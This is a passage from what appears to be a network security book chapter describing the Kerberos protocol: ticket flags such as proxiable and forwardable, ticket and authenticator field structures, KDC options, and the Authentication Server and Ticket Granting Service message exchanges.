Proxiable and Proxy TicketsSometimes, a principal might need to enable a service to perform an operation on its behalf.The service must be able to take on the identity of the client, but only for a particular purpose.A principal can permit a service to take on the principal’s identity for a particular purpose bygranting it a proxy.

The PROXIABLE flag in a ticket normally is interpreted only by the Ticket Granting Service.Application servers can ignore it. When set, this flag gives the Ticket Granting Server the goahead to issue a new ticket (but not a Ticket Granting Ticket) with a different network addressbased on this ticket. This flag is set by default. This flag enables a client to pass a proxy to aserver to perform a remote request on its behalf. A print service client, for example, can givethe print server a proxy to access the client’s files on a particular file server to satisfy a printrequest.

To complicate the use of stolen credentials, Kerberos tickets usually are valid only from thosenetwork addresses specifically included in the ticket. You can request or issue tickets with nonetwork addresses specified, but doing so is not recommended. Therefore, a client that wantsto grant a proxy must request a new ticket valid for the network address of the service to begranted the proxy.

The PROXY flag is set in a ticket by the Ticket Granting Server when it issues a proxy ticket.Application servers may check this flag and require additional authentication from the agentbefore presenting the proxy in order to provide an audit trail.

Forwardable TicketsAuthentication forwarding is an instance of the proxy case where the service is grantedcomplete use of the client’s identity. A user might log in to a remote system, for example, andwant authentication to work from that system as if the login were local.

The FORWARDABLE flag in a ticket normally is interpreted only by the Ticket GrantingService. Application servers can ignore it. The FORWARDABLE flag has an interpretationsimilar to that of the PROXIABLE flag, except Ticket Granting Tickets also can be issuedusing different network addresses. This flag is reset by default, but users can request that it beset by setting the FORWARDABLE option in the Authentication Server request when theyrequest the initial Ticket Granting Ticket.

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When set, the FORWARDABLE flag permits authentication forwarding without requiringthe user to reenter a password. If the flag is not set, then authentication forwarding is notpermitted. The same end result still can be achieved if the user engages in the AuthenticationServer exchange with the requested network addresses and supplies a password.

The FORWARDED flag is set by the Ticket Granting Server when a client presents a ticketwith the FORWARDABLE flag set and requests it be set by specifying the FORWARDEDKey Distribution Center option and supplying a set of addresses for the new ticket. It also isset in all tickets issued based on tickets with the FORWARDED flag set. Application serversmight want to process FORWARDED tickets differently from non-FORWARDED tickets.

Authentication FlagsThree flags indicate information about the user’s authentication status. INITIAL, PRE-AUTHENT, and HW-AUTHENT are set at the time of authentication.

INITIAL is set by the Authentication Server whenever a ticket is issued as a result of anauthentication. This flag does not carry forward onto future tickets, so it serves to indicate thatthis ticket was authenticated directly, which is useful for applications that require a specificauthentication prior to proceeding, such as the login or password changing programs.

Note Some of the possible Kerberos startup cycles can result in a ticket being issuedbefore the user is authenticated. These tickets should be usable only by the legiti-mate user. The PRE-AUTHENT flag is set after a specific authentication takes place.

Finally, the flag HW-AUTHENT indicates that the user was hardware authenticated. Hard-ware authentication through the use of tokens or biometrics generally is stronger than simplepassword authentication. Applications dealing with particularly sensitive information or largefinancial transactions might want to insist on a hardware authentication.

Other Key Distribution Center OptionsTwo additional options can be set in a client’s request of the Key Distribution Center. TheRENEWABLE-OK option indicates that the client will accept a renewable ticket if a ticketwith the requested life cannot otherwise be provided. If a ticket with the requested life cannotbe provided, then the Key Distribution Center can issue a renewable ticket with a renew-tillequal to the requested end time. The value of the renew-till field still can be adjusted by site-determined limits or limits imposed by the individual principal or server.

The ENC-TKT-IN-SKEY option is honored only by the Ticket Granting Service. It indicatesthat the to-be-issued ticket for the end server is to be encrypted in the session key from theadditional Ticket Granting Ticket provided with the request.

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Message ExchangesEvery time a new application is started, or a new session is established, the Kerberosizedapplications communicate with the client to authenticate the user. The following sectionsdescribe the interactions between network clients and servers and the messages involved inthose exchanges.

Tickets and AuthenticatorsThis section describes the format and encryption parameters for tickets and authenticators.When a ticket or authenticator is included in a protocol message, it is treated as an opaqueobject.

TicketsA ticket is a record that helps a client authenticate to a service. A ticket contains the followinginformation:

Ticket = { tkt-vno[0] INTEGER, realm[1] Realm, sname[2] Principal Name, enc-part[3] EncryptdData }

— Encrypted part of ticket

EncryptdData = { flags[0] Ticket Flags, key[1] EncryptionKey, crealm[2] Realm, cname[3] Principal Name, transited[4] Transited Encoding, authtime[5] KerberosTime, starttime[6] KerberosTime OPTIONAL, endtime[7] KerberosTime, renew-till[8] KerberosTime OPTIONAL, caddr[9] HostAddresses OPTIONAL, authorization-data[10] AuthorizationData OPTIONAL }

— encoded Transited field

TransitedEncoding = { tr-type[0] INTEGER — must be registered contents[1] BYTE STRING }

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The encoding of EncryptdData is encrypted in the key shared by Kerberos and the end server(the server’s secret key). Table 9.2 describes the fields in the ticket.

Table 9.2Ticket Field Descriptions

Field Description

tkt-vno Specifies the version number of the ticket.

realm Specifies the realm that issued the ticket. Also serves to identify therealm part of the server’s principal identifier. Because a Kerberos servercan issue tickets only for servers within its realm, the two always areidentical.

sname Specifies the name part of the server’s identity.

enc-part Holds the encrypted encoding of the EncryptdData sequence.

flags Indicates which of various options were used or requested when theticket was issued.

key Exists in the ticket and the Key Distribution Center response and isused to pass the session key from Kerberos to the application server andthe client.

crealm Contains the name of the realm in which the client is registered and inwhich initial authentication took place.

cname Contains the name part of the client’s principal identifier.

transited Lists the names of the Kerberos realms that took part in authenticatingthe user to whom this ticket was issued.

authtime Indicates the time of initial authentication for the named principal.Serves as the time of issue for the original ticket on which this ticket isbased. Included in the ticket to provide additional information to theend service.

starttime Specifies the time after which the ticket is valid. Combined withendtime, specifies the life of the ticket. If absent from the ticket, itsvalue should be treated as that of the authtime field.

endtime Contains the time after which the ticket is no longer honored (itsexpiration time). Individual services can place their own limits on thelife of a ticket and reject tickets that have not yet expired. As such, thisis really an upper bound on the expiration time for the ticket.

renew-till Indicates the maximum endtime that can be included in a renewal.Present only in tickets that have the RENEWABLE flag set in the flags

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field. Can be thought of as the absolute expiration time for the ticket,including all renewals.

caddr Contains zero or more host addresses, which are the addresses fromwhich the ticket can be used. If no addresses, the ticket can be usedfrom any location. The Key Distribution Center’s decision to issue orthe end server’s decision to accept a zero-address ticket is a policydecision left to the Kerberos and end-service administrators. They canrefuse to issue or accept such tickets.

The ticket includes network addresses to make it harder for an attackerto use stolen credentials. Because the session key is not sent over thenetwork in cleartext, credentials can’t be stolen simply by listening tothe network. An attacker has to gain access to the session key (perhapsthrough operating system security breaches or a careless user’s unat-tended session) to successfully use stolen tickets.

authorization-data Serves to pass authorization data from the principal on whose behalf aticket was issued to the application service. Contains the names ofservice-specific objects and the rights to those objects, specific to theend service. If no authorization data is included, it is left out.

A principal can use this field to issue a proxy that is valid for a specificpurpose. A client who wants to print a file, for example, can obtain afile server proxy to be passed to the print server. By specifying thename of the file in the authorization-data field, the file server knowsthat the print server can use only the client’s rights when accessing theparticular file to be printed.

The authorization-data field is optional and does not have to beincluded in a ticket.

AuthenticatorsAn authenticator is a record sent using a ticket to a server to certify the client’s knowledge ofthe encryption key in the ticket, to help the server detect replays, and to help choose a “truesession key” to use with the particular session. The encoding is encrypted in the ticket’s sessionkey shared by the client and the server. An authenticator contains the following fields:

Authenticator = { authenticator-vno[0] INTEGER, crealm[1] Realm, cname[2] Principal Name, cksum[3] Checksum OPTIONAL,

Field Description

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cusec[4] INTEGER, ctime[5] KerberosTime, subkey[6] EncryptionKey OPTIONAL, seq-number[7] INTEGER OPTIONAL, authorization-data[8] AuthorizationData OPTIONAL }

Table 9.3 describes the fields in the authenticator.

Table 9.3Authenticator Field Descriptions

Field Description

authenticator-vno Specifies the version number for the format of the authenticator.

crealm and cname Same as described for the ticket.

cksum Contains a checksum of the application data that accompanies theKRB_AP_REQ.

cusec Contains the microsecond part of the client’s timestamp (its valueranges from 0 to 999999). Often appears along with ctime, because thetwo fields are used together to specify a reasonably accurate timestamp.

ctime Contains the current time on the client’s host.

subkey Contains the client’s choice for an encryption key to be used to protectthis specific application session. Unless an application specifiesotherwise, if this field is left out, the session key from the ticket is used.

seq-number Includes the initial sequence number to be used by the KRB_PRIV or(optional) KRB_SAFE messages when sequence numbers are used to detect

replays. (It may also be used by application-specific messages.) Whenincluded in the authenticator, this field specifies the initial sequencenumber for messages from the client to the server. When included inthe AP-REP message, the initial sequence number is that for messagesfrom the server to the messages. Incremented by one after each messageis sent when used in KRB_PRIV or KRB_SAFE messages.

For sequence numbers to adequately support the detection of replays,they should be nonrepeating, even across connection boundaries. Theinitial sequence number should be random and uniformly distributedacross the full space of possible sequence numbers, so an attackercannot guess it and successive sequence numbers do not repeat othersequences.

authorization-data Same as described for the ticket. Optional, and appears only whenadditional restrictions are placed on the use of a ticket.

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The Authentication Service ExchangeThe Authentication Service (AS) exchange between the client and the Kerberos AuthenticationServer is usually initiated by a client when it wants to obtain authentication credentials for agiven server but currently holds no credentials. The client’s secret key is used for encryptionand decryption. This exchange typically is used at the initiation of a login session to obtaincredentials for a Ticket Granting Server, which will subsequently be used to obtain credentialsfor other servers without requiring further use of the client’s secret key. This exchange also isused to request credentials for services that must not be mediated through the Ticket GrantingService, but rather require a principal’s secret key, such as the password-changing service. Apassword-changing request must not be honored unless the requester can provide the oldpassword (the user’s current secret key). Otherwise, it would be possible for someone to walkup to an unattended session and change another user’s password. This exchange does not byitself provide any assurance of the identity of the user.

To authenticate a user logging on to a local system, the credentials obtained in the Authentica-tion Server exchange can first be used in a Ticket Granting Server exchange to obtain creden-tials for a local server. Those credentials must then be verified by the local server throughsuccessful completion of the Client/Server exchange.

Note The exchange consists of two messages: KRB_AS_REQ from the client to Kerberos,and KRB_AS_REP or KRB_ERROR in reply.

In the request, the client sends (in cleartext) its own identity and the identity of the server forwhich it is requesting credentials. The response, KRB_AS_REP, contains a ticket for the clientto present to the server, and a session key to be shared by the client and the server. The sessionkey and additional information are encrypted in the client’s secret key.

The KRB_AS_REP message contains information that can be used to detect replays andassociate it with the message to which it replies. Various errors can occur, indicated by an errorresponse (KRB_ERROR) rather than the KRB_AS_REP response. The error message is notencrypted. The KRB_ERROR message also contains information that can be used to associateit with the message to which it replies. The lack of encryption in the KRB_ERROR messageprecludes the capability to detect replays or fabrications of such messages.

Usually, the Authentication Server does not know whether the client truly is the principalnamed in the request. It simply sends a reply without knowing or caring whether they arethe same—which is acceptable because nobody but the principal whose identity was given inthe request can use the reply. Its critical information is encrypted in that principal’s key. Theinitial request supports an optional field that can be used to pass additional information thatmight be needed for the initial exchange. This field can be used for preauthentication, but themechanism is not currently specified.

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Generation of KRB_AS_REQ MessageThe client can specify a number of options in the initial request. Among these options are thefollowing:

■ Whether to perform preauthentication

■ Whether the requested ticket is to be renewable, proxiable, or forwardable

■ Whether the ticket should be postdated or permit postdating of derivative tickets, andwhether a renewable ticket can be accepted in lieu of a nonrenewable ticket if therequested ticket expiration date cannot be satisfied by a nonrenewable ticket (due toconfiguration constraints)

The client prepares the KRB_AS_REQ message and sends it to the Key Distribution Center.

Receipt of a KRB_AS_REQ MessageIf all goes well, processing the KRB_AS_REQ message results in the creation of a ticket for theclient to present to the server.

Generation of a KRB_AS_REP MessageThe authentication server looks up the client and server principals named in theKRB_AS_REQ in its database, extracting their respective keys. If required, the serverpreauthenticates the request, and if the preauthentication check fails, an error message with thecode KDC_ERR_PREAUTH_FAILED is returned. If the server cannot accommodate therequested encryption type, an error message with code KDC_ERR_ETYPE_NOSUPP isreturned. Otherwise, it generates a random session key.

Random means that, among other things, guessing the next session key based on knowledge ofpast session keys should be impossible. This can only be achieved in a pseudo-random numbergenerator if it is based on cryptographic principles. Using a truly random number generator,such as one based on measurements of randomly physical phenomena, is preferred.

If the requested start time is absent or indicates a time in the past, then the start time ofthe ticket is set to the authentication server’s current time. If it indicates a time in thefuture, but the POSTDATED option has not been specified, then the errorKDC_ERR_CANNOT_POSTDATE is returned; otherwise, the requested start time ischecked against the policy of the local realm. The administrator might decide to prohibitcertain types or ranges of postdated tickets. If acceptable, the ticket’s start time is set asrequested and the INVALID flag is set in the new ticket. The postdated ticket must bevalidated before use by presenting it to the Key Distribution Center after the start time hasbeen reached.

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The expiration time of the ticket will be set to the minimum of the following:

■ The expiration time (endtime) requested in the KRB_AS_REQ message

■ The ticket’s start time plus the maximum allowable lifetime associated with the clientprincipal (the authentication server’s database includes a maximum ticket lifetime fieldin each principal’s record)

■ The ticket’s start time plus the maximum allowable lifetime associated with the serverprincipal

■ The ticket’s start time plus the maximum lifetime set by the policy of the local realm

If the requested expiration time minus the start time (as determined above) is less than a site-determined minimum lifetime, an error message with code KDC_ERR_NEVER_VALID isreturned. If the requested expiration time for the ticket exceeds what was determined as earlier,and if the RENEWABLE-OK option was requested, then the RENEWABLE flag is set in thenew ticket, and the renew-till value is set as if the RENEWABLE option were requested. If theRENEWABLE option has been requested or if the RENEWABLE-OK option has been setand a renewable ticket is to be issued, then the renew-till field is set to the minimum of one ofthe following:

■ Its requested value

■ The start time of the ticket plus the minimum of the two maximum renewable lifetimesassociated with the principals’ database entries

■ The start time of the ticket plus the maximum renewable lifetime set by the policy of thelocal realm

The flags field of the new ticket will have the following options set if they have been requestedand if the policy of the local realm permits: FORWARDABLE, MAY-POSTDATE, POST-DATED, PROXIABLE, RENEWABLE. If the new ticket is postdated (the start time is in thefuture), its INVALID flag also will be set.

If all of the preceding succeed, the server formats a KRB_AS_REP message. It copies theaddresses in the request into the caddr of the response, placing any required preauthenticationdata into the padata of the response. Finally it uses the requested encryption method toencrypt the ciphertext part in the client’s key and sends it to the client.

Receipt of a KRB_AS_REP MessageIf the reply message type is KRB_AS_REP, then the client verifies that the cname and crealmfields in the cleartext portion of the reply match what it requested. If any padata fields arepresent, they can be used to derive the proper secret key to decrypt the message.

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The client uses its secret key to decrypt the encrypted part of the response and verifies that thenonce in the encrypted part matches the nonce it supplied in its request (to detect replays). Italso verifies that the sname and srealm in the response match those in the request, and that thehost address field also is correct. It then stores the ticket, session key, start and expirationtimes, and other information for later use. The key-expiration field from the encrypted partof the response can be checked to notify the user of impending key expiration. The clientprogram could then suggest remedial action, such as a password change.

Proper decryption of the KRB_AS_REP message is not sufficient to verify the identity of theuser. The user and an attacker could cooperate to generate a KRB_AS_REP format messagethat decrypts properly but is not from the proper Key Distribution Center. If the host wants toverify the identity of the user, it must require the user to present application credentials thatcan be verified using a securely stored secret key. If those credentials can be verified, then theidentity of the user can be assured.

Generation of a KRB_ERROR MessageSeveral errors can occur, and the Authentication Server responds by returning an errormessage, KRB_ERROR, to the client, with the error-code and e-text fields set to appropriatevalues.

Receipt of a KRB_ERROR MessageIf the reply message type is KRB_ERROR, then the client interprets it as an error and per-forms whatever application-specific tasks are necessary to recover.

The Ticket Granting Service (TGS) ExchangeThe Ticket Granting Service exchange between a client and the Kerberos Ticket GrantingServer is initiated by a client when it wants to obtain authentication credentials for a givenserver. The server can be local or registered in a remote realm. It also is initiated when theclient wants to renew or validate an existing ticket or obtain a proxy ticket.

The client must already have acquired a ticket for the Ticket Granting Service using theAuthentication Server exchange. The Ticket Granting Ticket usually is obtained when a clientinitially authenticates to the system, such as when a user logs in. The message format for theTicket Granting Service exchange is almost identical to that for the Authentication Serverexchange. The primary difference is that encryption and decryption in the Ticket GrantingService exchange does not take place under the client’s key. Instead, the session key from theTicket Granting Ticket or renewable ticket, or subsession key from an Authenticator is used.As with all application servers, expired tickets are not accepted by the Ticket Granting Service.After a renewable or Ticket Granting Ticket expires, the client must use a separate exchange toobtain valid tickets.

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Note The exchange consists of two messages: KRB_TGS_REQ from the client to Kerberos,and KRB_TGS_REP or KRB_ERROR in reply.

The KRB_TGS_REQ message includes information that authenticates the client, plus arequest for credentials. The authentication information consists of the authentication header(KRB_AP_REQ), which includes the client’s previously obtained ticket-granting, renewable,or invalid ticket. In the Ticket Granting Ticket and proxy cases, the request can include one ormore of the following:

■ A list of network addresses

■ A collection of typed authorization data to be sealed in the ticket for authorization useby the application server, or additional tickets

The Ticket Granting Service reply (KRB_TGS_REP) contains the requested credentials,encrypted in the session key from the Ticket Granting Ticket or renewable ticket, or if present,in the subsession key from the Authenticator (part of the authentication header). TheKRB_ERROR message contains an error code and text that explains what went awry. TheKRB_ERROR message is not encrypted. The KRB_TGS_REP message contains informationthat can be used to detect replays and associate it with the message to which it replies. TheKRB_ERROR message also contains information that can be used to associate it with themessage to which it replies. The lack of encryption in the KRB_ERROR message, however,precludes the capability to detect replays or fabrications of such messages.

Generation of KRB_TGS_REQ MessageBefore sending a request to the Ticket Granting Service, the client must determine in whichrealm the application server is registered, using one of several ways:

■ It might be known beforehand (because the realm is part of the principal identifier).

■ It might be stored in a nameserver.

■ The information can be obtained from a configuration file.

If the realm to be used is obtained from a nameserver that is not authenticated, the dangerof being spoofed becomes quite real. This might result in the use of a realm that has beencompromised, and would result in an attacker’s ability to compromise the authentication ofthe application server to the client.

Note For more information on spoofing, see Chapter 6, “IP Spoofing and Sniffing.”

If the client does not already possess a Ticket Granting Ticket for the appropriate realm, thenone must be obtained. This is first attempted by requesting a Ticket Granting Ticket for the

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destination realm from the local Kerberos server. The Kerberos server may return a TicketGranting Ticket for the desired realm.

Alternatively, the Kerberos server may return a Ticket Granting Ticket for a realm that isfurther along the standard hierarchical path to the desired realm. In this case, the client mustrepeat this step using a Kerberos server in the realm specified in the returned Ticket GrantingTicket. If neither is returned, then the request must be retried using a Kerberos server for arealm higher in the hierarchy. This request requires a Ticket Granting Ticket for the higherrealm that must be obtained by recursively applying these directions.

In the sample company, if a user in PROJECTX.RESEARCH.ABC.COM wants to useservices in PROJECTX.PAYROLL.ABC.COM, the software asks the local server atPROJECTX.RESEARCH.ABC.COM for credentials. If they are not forthcoming directly theserver will return credentials for RESEARCH.ABC.COM. In turn, RESEARCH will returncredentials for ABC.COM, which will return credentials for PAYROLL.ABC.COM. Finallyhe will get credentials for PROJECTX.RESEARCH.ABC.COM. Luckily for the user, this fivestep process will all take place automatically.

After the client obtains a Ticket Granting Ticket for the appropriate realm, it determineswhich Kerberos servers serve that realm and contacts one. The list could be obtained through aconfiguration file or network service. As long as the secret keys exchanged by realms are keptsecret, only denial of service can result from a false Kerberos server.

As in the Authentication Server exchange, the client may specify a number of options in theKRB_TGS_REQ message. The client prepares the KRB_TGS_REQ message, providing anauthentication header as an element of the padata field, and including the same fields as usedin the KRB_AS_REQ message along with several optional fields: the enc-authorization-datafield for application server use and additional tickets required by some options.

In preparing the authentication header, the client can select a subsession key under which theresponse from the Kerberos server will be encrypted. If the client selects a subsession key, caremust be taken to ensure the randomness of the selected subsession key. If the subsession key isnot specified, the session key from the Ticket Granting Ticket is used. If the enc-authoriza-tion-data is present, it must be encrypted in the subsession key, if present, from the authentica-tor portion of the authentication header, or if not present, in the session key from the TicketGranting Ticket.

After the message is prepared, it is sent to a Kerberos server for the destination realm.

Receipt of a KRB_TGS_REQ MessageThe KRB_TGS_REQ message is processed in a manner similar to the KRB_AS_REQmessage. However, there are many additional checks to be performed. The Kerberos servermust determine the server for which the accompanying ticket is destined and select theappropriate key to decrypt it. Usually, it’s for the Ticket Granting Service and the Ticket

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Granting Service’s key is used. If another realm issued the Ticket Granting Ticket, then theappropriate inter-realm key must be used. If the accompanying ticket is for an applicationserver in the current realm, and the RENEW, VALIDATE, or PROXY options are specified inthe request, and the server for which a ticket is requested is the server named in the accompa-nying ticket, then the Key Distribution Center uses the key of the application server to decryptthe ticket in the authentication header. If no ticket can be found in the padata field, theKDC_ERR_PADATA_TYPE_NOSUPP appears.

After the accompanying ticket has been decrypted, the user-supplied checksum in theAuthenticator must be verified against the contents of the request. The message is rejectedif the checksums do not match (with an error code of KRB_AP_ERR_MODIFIED) or ifthe checksum is not keyed or not collision-proof (with an error code ofKRB_AP_ERR_INAPP_CKSUM). If the checksum type is not supported, theKDC_ERR_SUMTYPE_NOSUPP error is returned. If the authorization-data arepresent, they are decrypted using the subsession key from the Authenticator.

If any of the decryptions indicate failed integrity checks, theKRB_AP_ERR_BAD_INTEGRITY error is returned.

Generation of a KRB_TGS_REP MessageThe KRB_TGS_REP includes a ticket for the requested server. The Kerberos database isqueried to retrieve the record for the requested server, including the key with which the ticketis to be encrypted. If the request is for a ticket granting ticket for a remote realm, and if no keyis shared with the requested realm, then the Kerberos server selects the realm closest to therequested realm with which it does share a key, and uses that realm. This is the only case inwhich the response from the Key Distribution Center is for a different server than thatrequested by the client.

By default, the address field, the client’s name and realm, the list of transited realms, thetime of initial authentication, the expiration time, and the authorization data of the newlyissued ticket are copied from the Ticket Granting Ticket or renewable ticket. If thetransited field needs to be updated, but the transited type is not supported, theKDC_ERR_TRTYPE_NOSUPP error is returned.

If the request specifies an end time, then the end time of the new ticket is set to the minimumof the following:

■ That request.

■ The end time from the Ticket Granting Ticket.

■ The start time of the Ticket Granting Ticket plus the minimum of the maximum life forthe application server and the maximum life for the local realm. The maximum life forthe requesting principal was already applied when the Ticket Granting Ticket wasissued.

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If the new ticket is to be renewed, then the preceding end time is replaced by the minimum ofthe following:

■ The value of the renew_till field of the ticket

■ The start time for the new ticket plus the life (end time-start time) of the old ticket

If the FORWARDED option has been requested, then the resulting ticket contains theaddresses specified by the client. This option is honored only if the FORWARDABLE flag isset in the Ticket Granting Ticket. The PROXY option is similar. The resulting ticket containsthe addresses specified by the client. It is honored only if the PROXIABLE flag in the TicketGranting Ticket is set. The PROXY option is not honored on requests for additional TicketGranting Tickets.

If the requested start time is absent or indicates a time in the past, then the start time of theticket is set to the authentication server’s current time. If it indicates a time in the future, butthe POSTDATED option has not been specified or the MAY-POSTDATE flag is not set inthe Ticket Granting Ticket, then the error KDC_ERR_CANNOT_POSTDATE is returned.Otherwise, if the Ticket Granting Ticket has the MAYPOSTDATE flag set, then the resultingticket will be postdated and the requested start time is checked against the policy of the localrealm. If acceptable, the ticket’s start time is set as requested, and the INVALID flag is set. Thepostdated ticket must be validated before use by presenting it to the Key Distribution Centerafter the start time has been reached. However, in no case may the start time, end time, orrenew-till time of a newly issued postdated ticket extend beyond the renew-till time of theTicket Granting Ticket.

If the ENC-TKT-IN-SKEY option has been specified and an additional ticket has beenincluded in the request, the Key Distribution Center will decrypt the additional ticket usingthe key for the server to which the additional ticket was issued and verify that it is a TicketGranting Ticket. If the name of the requested server is missing from the request, the name ofthe client in the additional ticket will be used. Otherwise the name of the requested server willbe compared to the name of the client in the additional ticket and if different, the request willbe rejected. If the request succeeds, the session key from the additional ticket will be used toencrypt the new ticket that is issued instead of using the key of the server for which the newticket will be used. This enables easy implementation of user-to-user authentication, whichuses Ticket Granting Ticket session keys instead of secret server keys in situations where suchsecret keys could be easily compromised.

If the RENEW option is requested, then the Key Distribution Center will verify that theRENEWABLE flag is set in the ticket and that the renew_till time is still in the future. If theVALIDATE option is requested, the Key Distribution Center will check that the start time haspassed and the INVALID flag is set. If the PROXY option is requested, then the Key Distribu-tion Center will check that the PROXIABLE flag is set in the ticket. If the tests succeed, theKey Distribution Center will issue the appropriate new ticket.

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Whenever a request is made to the Ticket Granting Server, the presented ticket(s) is checkedagainst a hot-list of tickets that have been canceled. This hot-list might be implemented bystoring a range of issue dates for “suspect tickets.” If a presented ticket had an authtime in thatrange, it would be rejected. In this way, a stolen Ticket Granting Ticket or renewable ticketcannot be used to gain additional tickets (renewals or otherwise) once the theft has beenreported. Any normal ticket obtained before it was reported stolen will still be valid, but onlyuntil the normal expiration time.

The ciphertext part of the response in the KRB_TGS_REP message is encrypted in the sub-session key from the Authenticator, if present, or the session key from the Ticket GrantingTicket. It is not encrypted using the client’s secret key. Furthermore, the client’s key’s expira-tion date and the key version number fields are left out because these values are stored alongwith the client’s database record, and that record is not needed to satisfy a request based on aTicket Granting Ticket.

Encoding the Transited FieldIf the identity of the server in the Ticket Granting Ticket that is presented to the Key Distri-bution Center as part of the authentication header is that of the Ticket Granting Service, butthe Ticket Granting Ticket was issued from another realm, the Key Distribution Center looksup the inter-realm key shared with that realm and uses that key to decrypt the ticket. If theticket is valid, the Key Distribution Center honors the request, subject to the constraintsoutlined earlier in the section describing the Authentication Server exchange.

The realm part of the client’s identity is taken from the Ticket Granting Ticket. The name ofthe realm that issued the Ticket Granting Ticket is added to the transited field of the ticket tobe issued. This is accomplished by reading the transited field from the Ticket Granting Ticket,adding the new realm to the set, then constructing and writing out its encoded (shorthand)form. This may involve a rearrangement of the existing encoding.

The Ticket Granting Service does not add the name of its own realm. Instead, its responsibilityis to add the name of the previous realm. This prevents a malicious Kerberos server fromintentionally leaving out its own name. It could, however, omit other realms’ names.

The names of neither the local realm nor the principal’s realm are included in the transitedfield. They appear elsewhere in the ticket and both are known to have taken part in authenti-cating the principal. Because the endpoints are not included, both local and single-hop inter-realm authentication result in an empty transited field.

Because the name of each realm transited is added to this field, it can become very long. Todecrease the length of this field, its contents are encoded. The initially supported encoding isoptimized for the normal case of inter-realm communication, a hierarchical arrangement ofrealms using domain or X.500 style realm names. This encoding is called DOMAIN-X500-COMPRESS.

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Receipt of a KRB_TGS_REP MessageAfter the client receives the KRB_TGS_REP, it processes it in the same manner as theKRB_AS_REP processing described earlier. The primary difference is that the ciphertext partof the response must be decrypted using the session key from the Ticket Granting Ticketrather than the client’s secret key.

Specifications for the Authentication Serverand Ticket Granting Service Exchanges

This section specifies the format of the messages used in exchange between the client and theKerberos server.

Key Distribution Center Option FlagsRequests to the Key Distribution Center can be accompanied by a list of optional requests.These options indicate the flags that the client wants set on the tickets, as well as otherinformation to modify the behavior of the Key Distribution Center. Options are specifiedin a bit field, kdc_options.

Where appropriate, the name of an option may be the same as the flag set by that option.Although usually the bit in the options field is the same as that in the flags field, this is notguaranteed. Table 9.4 describes the Key Distribution Center options.

Table 9.4Key Distribution Center Options

Bit(s) Name Description

0 RESERVED Reserved for future expansion.

1 FORWARDABLE The FORWARDABLE option indicates that the ticket tobe issued is to have its forwardable flag set.

2 FORWARDED The FORWARDED option is only specified in a requestto the Ticket Granting Server and will only be honored ifthe Ticket Granting Ticket in the request has itsFORWARDABLE bit set. This option indicates that thisis a request for forwarding. The address(es) of the hostfrom which the resulting ticket is to be valid are includedin the addresses field of the request.

3 PROXIABLE The PROXIABLE option indicates that the ticket to beissued is to have its proxiable flag set. It may only be seton the initial request, or in a subsequent request if theTicket Granting Ticket on which it is based is alsoproxiable.

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4 PROXY The PROXY option indicates that this is a request for aproxy. This option will only be honored if the TicketGranting Ticket in the request has its PROXIABLE bitset. The address(es) of the host from which the resultingticket is to be valid are included in the addresses field ofthe request.

5 ALLOW-POSTDATE The ALLOW-POSTDATE option indicates that theticket to be issued is to have its MAY-POSTDATE flagset. It may only be set on the initial request, or if theTicket Granting Ticket on which it is based also has itsMAY-POSTDATE flag set.

6 POSTDATED The POSTDATED option indicates that this is a requestfor a postdated ticket. This option will only be honored ifthe Ticket Granting Ticket on which it is based has itsMAY-POSTDATE flag set. The resulting ticket will alsohave its INVALID flag set, and that flag may be reset by asubsequent request to the Key Distribution Center afterthe start time in the ticket has been reached.

7 UNUSED This option is presently unused.

8 RENEWABLE The RENEWABLE option indicates that the ticket to beissued is to have its RENEWABLE flag set. It may onlybe set on the initial request, or when the Ticket GrantingTicket on which the request is based is also renewable. Ifthis option is requested, then the rtime field in the requestcontains the desired absolute expiration time for theticket.

9–26 RESERVED Reserved for future use.

27 RENEWABLE-OK The RENEWABLE-OK option indicates that a renew-able ticket will be acceptable if a ticket with the requestedlife cannot otherwise be provided. If a ticket with therequested life cannot be provided, then a renewable ticketmay be issued with a renew-till equal to the requested endtime. The value of the renew-till field may still be limitedby local limits, or limits selected by the individualprincipal or server.

28 ENC-TKT-IN-SKEY This option is used only by the Ticket Granting Service.The ENC-TKT-IN-SKEY option indicates that the ticket

Bit(s) Name Description


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for the end server is to be encrypted in the session keyfrom the additional Ticket Granting Ticket provided.

29 RESERVED Reserved for future use.

30 RENEW The RENEW option indicates that the present request isfor a renewal. This option will only be honored if theticket to be renewed has its RENEWABLE flag set and ifthe time in its renew-till field has not passed. The ticketto be renewed is passed in the padata field as part of theauthentication header.

31 VALIDATE This option is used only by the Ticket Granting Service.The VALIDATE option indicates that the request is tovalidate a postdated ticket. It will only be honored if theticket presented is postdated, presently has its INVALIDflag set, and would be otherwise usable at this time. Aticket cannot be validated before its start time.

KRB_KDC_REQ DefinitionThe KRB_KDC_REQ message has no type of its own. Instead, its type is eitherKRB_AS_REQ or KRB_TGS_REQ, depending on whether the request is for an initial ticketor an additional ticket. In either case, the message is sent from the client to the AuthenticationServer to request credentials for a service.

The message fields are as follows:


KDC-REQ = { pvno[1] INTEGER, msg-type[2] INTEGER, padata[3] SEQUENCE OF PA-DATA OPTIONAL, req-body[4] KDC-REQ-BODY }

PA-DATA = { padata-type[1] INTEGER, padata-value[2] BYTE STRING, } — might be encoded AP-REQ

Table 9.4, ContinuedKey Distribution Center Options

Bit(s) Name Description

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padata-type = PA-ENC-TIMESTAMPpadata-value = EncryptedData — PA-ENC-TS-ENC

PA-ENC-TS-ENC = { patimestamp[0] KerberosTime, — client’s time pausec[1] INTEGER OPTIONAL }

KDC-REQ-BODY = { kdc-options[0] KDCOptions, cname[1] PrincipalName OPTIONAL, — Used only in AS-REQ realm[2] Realm, — Server’s realm — Also client’s in AS-REQ sname[3] PrincipalName OPTIONAL, from[4] KerberosTime OPTIONAL, till[5] KerberosTime, rtime[6] KerberosTime OPTIONAL, nonce[7] INTEGER, etype[8] SEQUENCE OF INTEGER, — EncryptionType, — in preference order addresses[9] HostAddresses OPTIONAL,enc-authorization-data[10] EncryptedData OPTIONAL, — Encrypted AuthorizationData encoding additional-tickets[11] SEQUENCE OF Ticket OPTIONAL

The fields in this message are described in table 9.5.

Table 9.5KRB_KDC_REQ Message Fields

Field Description

pvno Specifies the protocol version number of each message.

msg-type Indicates the type of protocol message. Almost always the same asthe application identifier associated with a message. Included tomake the identifier more readily accessible to the application. Forthe KDC-REQ message, is KRB_AS_REQ or KRB_TGS_REQ.

padata Contains authentication information that may be needed beforecredentials can be issued or decrypted. In the case of requests foradditional tickets (KRB_TGS_REQ), this field includes anelement that has padata-type of PA-TGS-REQ and data of anauthentication header (Ticket Granting Ticket and authenticator).The checksum in the authenticator (which must be collision-proof) is to be computed over the KDC-REQ-BODY encoding.


